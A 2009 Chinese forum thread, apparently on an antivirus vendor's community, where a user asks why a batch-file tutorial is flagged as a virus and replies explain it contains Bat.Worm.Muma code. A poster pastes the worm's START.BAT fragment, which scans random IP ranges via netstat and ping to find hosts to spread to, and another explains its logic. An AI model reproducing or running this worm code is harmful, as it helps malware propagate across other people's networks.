与火同舞 - 2009-4-24 20:51:00
瑞星软件扫出来的,我也用邮件上报瑞星,可是答复是该文件是病毒,请大侠帮忙分析一下,
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)附件:
bat批处理教程.rar
CPU_ring0 - 2009-4-24 22:35:00
该用户帖子内容已被屏蔽
与火同舞 - 2009-4-24 22:43:00
乱说
随缘92WJC - 2009-4-24 23:01:00
是因为文本里有Bat.Worm.Muma的代码,所以被杀掉了
教程中的简易病毒制作:
这是Bat.Worm.Muma病毒的起始脚本,设置了病毒运行的环境变量。是不是看的头都大了?
真实扩展名是TXT文本文档,原因是这段病毒代码
夲號ヱ被ジ盜 - 2009-4-24 23:09:00
这段有点毛病
如果1、2、3、4
那么。。。。
START.BAT:
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
与火同舞 - 2009-4-25 2:09:00
那是不是就是说原本的这个TXT文本是没有病毒的,只是里面写有病毒代码而被报毒了,如果直接运行这个文本是不会中毒的,是吗?
这个文件可以放在电脑里吗,会不会感染木马病毒?
文物2 - 2009-4-25 16:17:00
把ping %NUM1%.%NUM2%.%NUM3%.1网关和%NUM1%.%NUM2%.%NUM3%.%NUM4%的结果记载在B.TMP文件里。
其中,把192.0.0.0/8,127.0.0.0/8两个可变长子网掩码和广播地址扔掉。
随缘92WJC - 2009-4-25 16:20:00
这个只是教程,可以忽略的,但是有病毒代码杀软会毫不留情的杀掉,可以从网上找段病毒代码复制到文档里测试下
不过像这种测试类的危害一般不大
© 2000 - 2025 Rising Corp. Ltd.